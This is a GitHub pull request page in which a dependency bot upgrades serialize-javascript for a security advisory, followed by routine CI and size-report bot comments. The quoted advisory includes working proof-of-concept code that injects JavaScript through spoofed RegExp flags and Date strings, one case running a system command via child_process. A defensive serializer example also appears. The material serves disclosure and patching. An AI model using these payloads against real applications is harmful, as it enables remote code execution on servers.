
chore(deps): update dependency serialize-javascript to v7 [security] #499

Open

renovate[bot] wants to merge 1 commit into master from renovate/npm-serialize-javascript-vulnerability

Conversation


@renovate renovate bot commented Mar 2, 2026

This PR contains the following updates:

Package               Change             Age      Confidence
serialize-javascript  ^6.0.2 -> ^7.0.0   (badge)  (badge)

GitHub Vulnerability Alerts

GHSA-5c6j-r48x-rmvq

Impact

The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.

While RegExp.source is sanitized, RegExp.flags is interpolated directly into the generated output without escaping. A similar issue exists in Date.prototype.toISOString().

If an attacker can control the input object passed to serialize(), they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via eval, new Function, or <script> tags), the injected code executes.

```javascript
const serialize = require('serialize-javascript');
// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', {
  get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"'
});
fakeRegex.toJSON = function() { return '@placeholder'; };
const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
let obj;
eval('obj = ' + output);
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!
```

PoC 2: Code Injection via Date.toISOString()

```javascript
const serialize = require('serialize-javascript');
// An object that passes instanceof Date with a spoofed toISOString()
const fakeDate = Object.create(Date.prototype);
fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; };
fakeDate.toJSON = function() { return '2024-01-01'; };
const output = serialize({ d: fakeDate });
// Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")}
let obj;
eval('obj = ' + output);
console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed!
```

PoC 3: Remote Code Execution

```javascript
const serialize = require('serialize-javascript');
const rceRegex = Object.create(RegExp.prototype);
Object.defineProperty(rceRegex, 'source', { get: () => 'x' });
Object.defineProperty(rceRegex, 'flags', {
  get: () => '"+require("child_process").execSync("id").toString()+"'
});
rceRegex.toJSON = function() { return '@rce'; };
const output = serialize({ re: rceRegex });
// Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")}
// When eval'd on a Node.js server, executes the "id" system command
```

Patches

The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3


Release Notes

yahoo/serialize-javascript (serialize-javascript)

v7.0.3



v7.0.2


What's Changed

Full Changelog: yahoo/serialize-javascript@v7.0.1...v7.0.2

v7.0.1


What's Changed

New Contributors

Full Changelog: yahoo/serialize-javascript@v7.0.0...v7.0.1

v7.0.0


Breaking Changes

  • requires Node.js v20+

What's Changed

New Contributors

Full Changelog: yahoo/serialize-javascript@v6.0.2...v7.0.0


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR was generated by Mend Renovate. View the repository job log.
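The advisory above boils down to two untrusted strings (`RegExp.flags` and the result of `Date.prototype.toISOString()`) being spliced into generated source without escaping, on objects that only have to pass an `instanceof` check. The following is an added example, not serialize-javascript's own code and not its 7.0.3 patch, of how a serializer can close both holes from the defender's side: it reads `source`, `flags` and the ISO string through the native prototype accessors (which throw a TypeError on objects that merely inherit from `RegExp.prototype` or `Date.prototype`), restricts flags to the allow-listed letters, and emits every string through a JSON-escaping literal builder so no value can close the surrounding quote. The helper names (`safeSerialize`, `jsStringLiteral`, `makeSpoofedRegExp`, `rejectionName`) and the `MARKER` string are this example's own constructions; the spoofed objects mirror the shape of the PoC objects but carry no payload.

```javascript
// Added example (not serialize-javascript's code or its 7.0.3 patch): a small
// serializer that emits RegExp and Date values without trusting own properties
// an attacker can define on the object (`.source`, `.flags`, `.toISOString`).
// Names below are this example's own; only plain data, arrays, RegExp and Date
// values are handled.

const UNSAFE_CHARS = /[<>\/\u2028\u2029]/g;
const ESCAPES = {
  '<': '\\u003C', '>': '\\u003E', '/': '\\u002F',
  '\u2028': '\\u2028', '\u2029': '\\u2029',
};

// Build a JS string literal: JSON.stringify escapes quotes, backslashes and
// control characters; the second pass also neutralises "</script>" for
// output that ends up inside a <script> tag.
function jsStringLiteral(s) {
  return JSON.stringify(String(s)).replace(UNSAFE_CHARS, (c) => ESCAPES[c]);
}

// Native accessors taken from the prototypes. Invoked with .call(value) they
// ignore any own property the value defines, and RegExp.prototype.source and
// Date.prototype.toISOString throw a TypeError when the receiver lacks the
// real internal slot, i.e. when it was built with Object.create(prototype).
const nativeSource = Object.getOwnPropertyDescriptor(RegExp.prototype, 'source').get;
const nativeFlags = Object.getOwnPropertyDescriptor(RegExp.prototype, 'flags').get;
const nativeToISOString = Date.prototype.toISOString;

// The native flags getter is generic (it maps boolean flag properties to
// letters), so this allow-list is defence in depth rather than the only check.
const FLAGS_ALLOWLIST = /^[dgimsuvy]*$/;

function serializeRegExp(re) {
  const source = nativeSource.call(re);   // TypeError for spoofed objects
  const flags = nativeFlags.call(re);
  if (!FLAGS_ALLOWLIST.test(flags)) {
    throw new TypeError('unexpected RegExp flags ' + JSON.stringify(flags));
  }
  return 'new RegExp(' + jsStringLiteral(source) + ', ' + jsStringLiteral(flags) + ')';
}

function serializeDate(d) {
  // TypeError for spoofed objects, RangeError for an invalid Date.
  return 'new Date(' + jsStringLiteral(nativeToISOString.call(d)) + ')';
}

function safeSerialize(value) {
  if (value instanceof RegExp) return serializeRegExp(value);
  if (value instanceof Date) return serializeDate(value);
  if (Array.isArray(value)) return '[' + value.map(safeSerialize).join(',') + ']';
  if (value !== null && typeof value === 'object') {
    const members = Object.keys(value).map(
      (k) => jsStringLiteral(k) + ':' + safeSerialize(value[k]));
    return '{' + members.join(',') + '}';
  }
  if (typeof value === 'string') return jsStringLiteral(value);
  if (typeof value === 'number' || typeof value === 'boolean' || value === null) {
    return String(value);
  }
  throw new TypeError('unsupported value of type ' + typeof value);
}

// Constructed spoofs in the shape of the advisory's PoC objects, carrying a
// harmless MARKER instead of a payload. Both pass `instanceof`; neither has the
// internal slot the native accessors require.
const MARKER = '"+MARKER+"';

function makeSpoofedRegExp() {
  const fake = Object.create(RegExp.prototype);
  Object.defineProperty(fake, 'source', { get: () => 'x' });
  Object.defineProperty(fake, 'flags', { get: () => MARKER });
  return fake;
}

function makeSpoofedDate() {
  const fake = Object.create(Date.prototype);
  fake.toISOString = () => MARKER;
  return fake;
}

// Serialize and report which error class, if any, rejected the input.
function rejectionName(value) {
  try {
    safeSerialize(value);
    return null;
  } catch (e) {
    return e.name;
  }
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(safeSerialize({ re: /a"b/gi, d: new Date(0), s: '</script>' }));
  console.log(rejectionName({ re: makeSpoofedRegExp() })); // TypeError
  console.log(rejectionName({ d: makeSpoofedDate() }));    // TypeError
}
```

The brand check is the part that matters most: `instanceof` only walks the prototype chain, which `Object.create(RegExp.prototype)` satisfies, whereas the native `source` getter and `toISOString` need the object's internal slot and refuse anything else. Escaping the emitted strings is still required, because a genuine RegExp object is extensible and can have an own `flags` accessor defined on it; reading flags through the prototype getter and checking the allow-list makes that case harmless as well.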

@changeset-bot

changeset-bot bot commented Mar 2, 2026

⚠️ No Changeset found

Latest commit: bb29e64

Merging this PR will not cause a version bump for any packages. If these changes should not result in a new version, you're good to go. If these changes should result in a version bump, you need to add a changeset.

This PR includes no changesets

When changesets are added to this PR, you'll see the packages that this PR includes changesets for and the associated semver types



@ellipsis-dev ellipsis-dev bot left a comment


Important

Looks good to me! 👍

Reviewed everything up to e1c899b in 8 seconds. Click for details.
  • Reviewed 13 lines of code in 1 files
  • Skipped 1 files when reviewing.
  • Skipped posting 0 draft comments. View those below.
  • Modify your settings and rules to customize what types of comments Ellipsis leaves. And don't forget to react with 👍 or 👎 to teach Ellipsis.

Workflow ID: wflow_XnDO2vXslntf5xOv

You can customize Ellipsis by changing your verbosity settings, reacting with 👍 or 👎, replying to comments, or adding code review rules.

@codesandbox-ci

codesandbox-ci bot commented Mar 2, 2026

This pull request is automatically built and testable in CodeSandbox.

To see build info of the built libraries, click here or the icon next to each commit SHA.

@socket-security

socket-security bot commented Mar 2, 2026

Review the following changes in direct dependencies. Learn more about Socket for GitHub.

Diff     Package                              Supply Chain Security  Vulnerability  Quality  Maintenance  License
Updated  serialize-javascript@6.0.2 ⏵ 7.0.4   100 (+1)               100 (+16)      100      91 (-2)      100


@github-actions

github-actions bot commented Mar 2, 2026

📊 Package size report   No changes

File                          Before   After
Total (Includes all files)    3.4 MB   3.4 MB
Tarball size                  1.2 MB   1.2 MB (-0%)
Unchanged files
File Size
.changeset/config.json 313 B
.changeset/README.md 510 B
.codesandbox/ci.json 38 B
.editorconfig 161 B
.gitattributes 152 B
.github/workflows/autofix.yml 932 B
.github/workflows/ci.yml 1.6 kB
.github/workflows/pkg-pr-new.yml 695 B
.github/workflows/pkg-size.yml 609 B
.github/workflows/release.yml 1.3 kB
.github/workflows/size-limit.yml 802 B
.github/workflows/vercel.yml 1.1 kB
.nano-staged.js 48 B
.nvmrc 6 B
.postcssrc.cjs 51 B
.prettierignore 23 B
.prettierrc 24 B
.remarkrc 159 B
.renovaterc 49 B
.simple-git-hooks.js 49 B
.size-limit.json 290 B
.yarn/plugins/plugin-prepare-lifecycle.cjs 202 B
.yarn/releases/yarn-4.9.2.cjs 3.0 MB
.yarnrc.yml 397 B
assets/pkg.svg 15.1 kB
assets/sh.png 14.4 kB
CHANGELOG.md 393 B
docs/App.tsx 1.2 kB
docs/global.css 321 B
docs/index.tsx 211 B
eslint.config.js 503 B
index.html 414 B
LICENSE 1.1 kB
package.json 3.6 kB
packages/autocorrect/CHANGELOG.md 2.2 kB
packages/autocorrect/index.d.cts 63 B
packages/autocorrect/LICENSE 1.1 kB
packages/autocorrect/package.json 1.1 kB
packages/autocorrect/README.md 4.0 kB
packages/autocorrect/src/index.ts 1.4 kB
packages/autocorrect/src/types.ts 78 B
packages/autocorrect/test/__snapshots__/fixtures.spec.ts.snap 4.7 kB
packages/autocorrect/test/fixtures.spec.ts 961 B
packages/autocorrect/test/fixtures/test.css 189 B
packages/autocorrect/test/fixtures/test.go 470 B
packages/autocorrect/test/fixtures/test.html 1.1 kB
packages/autocorrect/test/fixtures/test.md 1.1 kB
packages/autocorrect/test/fixtures/test.py 368 B
packages/autocorrect/test/fixtures/test.rb 234 B
packages/autocorrect/test/fixtures/test0.js 453 B
packages/autocorrect/tsconfig.json 154 B
packages/pkg/CHANGELOG.md 13.6 kB
packages/pkg/index.d.cts 47 B
packages/pkg/LICENSE 16.7 kB
packages/pkg/package.json 1.0 kB
packages/pkg/README.md 7.2 kB
packages/pkg/src/index.ts 2.9 kB
packages/pkg/src/rules/files.ts 1.7 kB
packages/pkg/src/rules/object.ts 899 B
packages/pkg/src/rules/sort.ts 5.5 kB
packages/pkg/src/types.ts 1.1 kB
packages/pkg/src/utils.ts 596 B
packages/pkg/test/__snapshots__/engines.spec.ts.snap 158 B
packages/pkg/test/__snapshots__/files.spec.ts.snap 173 B
packages/pkg/test/__snapshots__/ignore-sort.spec.ts.snap 1.1 kB
packages/pkg/test/__snapshots__/sort-order-preset.spec.ts.snap 7.5 kB
packages/pkg/test/__snapshots__/sort-order.spec.ts.snap 964 B
packages/pkg/test/__snapshots__/test.spec.ts.snap 2.0 kB
packages/pkg/test/engines.spec.ts 417 B
packages/pkg/test/files.spec.ts 409 B
packages/pkg/test/fixtures/fixture1.json 1.0 kB
packages/pkg/test/fixtures/fixture2.json 863 B
packages/pkg/test/fixtures/fixture3.json 430 B
packages/pkg/test/ignore-sort.spec.ts 414 B
packages/pkg/test/sort-order-preset.spec.ts 708 B
packages/pkg/test/sort-order.spec.ts 442 B
packages/pkg/test/test.spec.ts 2.3 kB
packages/pkg/tsconfig.json 154 B
packages/sh/CHANGELOG.md 15.6 kB
packages/sh/index.d.cts 45 B
packages/sh/LICENSE 1.1 kB
packages/sh/package.json 1.4 kB
packages/sh/README.md 10.4 kB
packages/sh/src/index.ts 13.3 kB
packages/sh/test/__snapshots__/fixtures.spec.ts.snap 29.4 kB
packages/sh/test/__snapshots__/shellscript.spec.ts.snap 394 B
packages/sh/test/error.spec.ts 482 B
packages/sh/test/fixtures.spec.ts 1.4 kB
packages/sh/test/fixtures/.dockerignore 108 B
packages/sh/test/fixtures/.env.development 29 B
packages/sh/test/fixtures/.husky/precommit 17 B
packages/sh/test/fixtures/.nvmrc 6 B
packages/sh/test/fixtures/.properties 177 B
packages/sh/test/fixtures/133.sh 5.2 kB
packages/sh/test/fixtures/162.sh 15.7 kB
packages/sh/test/fixtures/182.sh 1.9 kB
packages/sh/test/fixtures/191.sh 1.7 kB
packages/sh/test/fixtures/278.Dockerfile 32 B
packages/sh/test/fixtures/292.Dockerfile 95 B
packages/sh/test/fixtures/376.Dockerfile 217 B
packages/sh/test/fixtures/384.Dockerfile 51 B
packages/sh/test/fixtures/398.Dockerfile 64 B
packages/sh/test/fixtures/441.Dockerfile 219 B
packages/sh/test/fixtures/445.Dockerfile 198 B
packages/sh/test/fixtures/445.sh 105 B
packages/sh/test/fixtures/Dockerfile 394 B
packages/sh/test/fixtures/hosts 406 B
packages/sh/test/fixtures/jvm.options 162 B
packages/sh/test/fixtures/no-ext 38 B
packages/sh/test/fixtures/shell.sh 368 B
packages/sh/test/loc-functions.spec.ts 1.2 kB
packages/sh/test/parser.spec.ts 2.1 kB
packages/sh/tsconfig.json 154 B
packages/sql/CHANGELOG.md 11.9 kB
packages/sql/index.d.cts 47 B
packages/sql/LICENSE 1.1 kB
packages/sql/package.json 1.3 kB
packages/sql/README.md 7.0 kB
packages/sql/src/index.ts 13.0 kB
packages/sql/test/__snapshots__/fixtures-eol.spec.ts.snap 886 B
packages/sql/test/__snapshots__/fixtures.spec.ts.snap 40.3 kB
packages/sql/test/__snapshots__/sql.spec.ts.snap 374 B
packages/sql/test/fixtures-eol.spec.ts 1.4 kB
packages/sql/test/fixtures-eol/556.sql 73 B
packages/sql/test/fixtures-eol/557.sql 69 B
packages/sql/test/fixtures-eol/558.sql 69 B
packages/sql/test/fixtures-eol/559.sql 73 B
packages/sql/test/fixtures.spec.ts 1.8 kB
packages/sql/test/fixtures/144.sql 68 B
packages/sql/test/fixtures/233.sql 68 B
packages/sql/test/fixtures/277.sql 88 B
packages/sql/test/fixtures/279.sql 106 B
packages/sql/test/fixtures/291.sql 1.2 kB
packages/sql/test/fixtures/334.sql 15 B
packages/sql/test/fixtures/405.sql 160 B
packages/sql/test/fixtures/basic.sql 120 B
packages/sql/test/sql.spec.ts 660 B
packages/sql/tsconfig.json 154 B
packages/toml/CHANGELOG.md 2.5 kB
packages/toml/index.d.cts 49 B
packages/toml/LICENSE 1.1 kB
packages/toml/package.json 1.1 kB
packages/toml/README.md 5.2 kB
packages/toml/src/index.ts 1.3 kB
packages/toml/src/options.ts 2.6 kB
packages/toml/src/types.ts 381 B
packages/toml/test/__snapshots__/fixtures.spec.ts.snap 493 B
packages/toml/test/fixtures.spec.ts 792 B
packages/toml/test/fixtures/comments.toml 87 B
packages/toml/test/fixtures/fixture1.toml 162 B
packages/toml/tsconfig.json 154 B
public/android-chrome-192x192.png 3.5 kB
public/android-chrome-512x512.png 12.6 kB
public/apple-touch-icon.png 3.5 kB
public/favicon-16x16.png 309 B
public/favicon-32x32.png 547 B
public/favicon.ico 15.4 kB
public/site.webmanifest 288 B
README.md 6.8 kB
scripts/format.ts 593 B
scripts/languages.ts 3.3 kB
test/global.d.ts 41 B
test/tsconfig.json 223 B
tsconfig.base.json 89 B
tsconfig.json 275 B
vercel.json 229 B
vite.config.ts 544 B
vitest.config.ts 541 B

🤖 This report was automatically generated by pkg-size-action

@pkg-pr-new

pkg-pr-new bot commented Mar 2, 2026


prettier-plugin-autocorrect

npm i https://pkg.pr.new/prettier-plugin-autocorrect@499

prettier-plugin-pkg

npm i https://pkg.pr.new/prettier-plugin-pkg@499

prettier-plugin-sh

npm i https://pkg.pr.new/prettier-plugin-sh@499

prettier-plugin-sql

npm i https://pkg.pr.new/prettier-plugin-sql@499

prettier-plugin-toml

npm i https://pkg.pr.new/prettier-plugin-toml@499

commit: 7de588d

@codecov

codecov bot commented Mar 2, 2026

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 86.69%. Comparing base (7a4346d) to head (bb29e64).

Additional details and impacted files
@@           Coverage Diff           @@
##           master     #499   +/-   ##
=======================================
  Coverage   86.69%   86.69%           
=======================================
  Files          10       10           
  Lines         203      203           
  Branches       57       57           
=======================================
  Hits          176      176           
  Misses         26       26           
  Partials        1        1           


@github-actions

github-actions bot commented Mar 2, 2026

size-limit report 📦

Path Size
packages/autocorrect/lib/index.js 477 B (0%)
packages/pkg/lib/index.js 758 B (0%)
packages/sh/lib/index.js 2.68 KB (0%)
packages/sql/lib/index.js 2.04 KB (0%)

@renovate renovate bot force-pushed the renovate/npm-serialize-javascript-vulnerability branch from e1c899b to bb29e64 on March 5, 2026 20:11
@sonarqubecloud

sonarqubecloud bot commented Mar 5, 2026


Labels: None yet

Projects: None yet


0 participants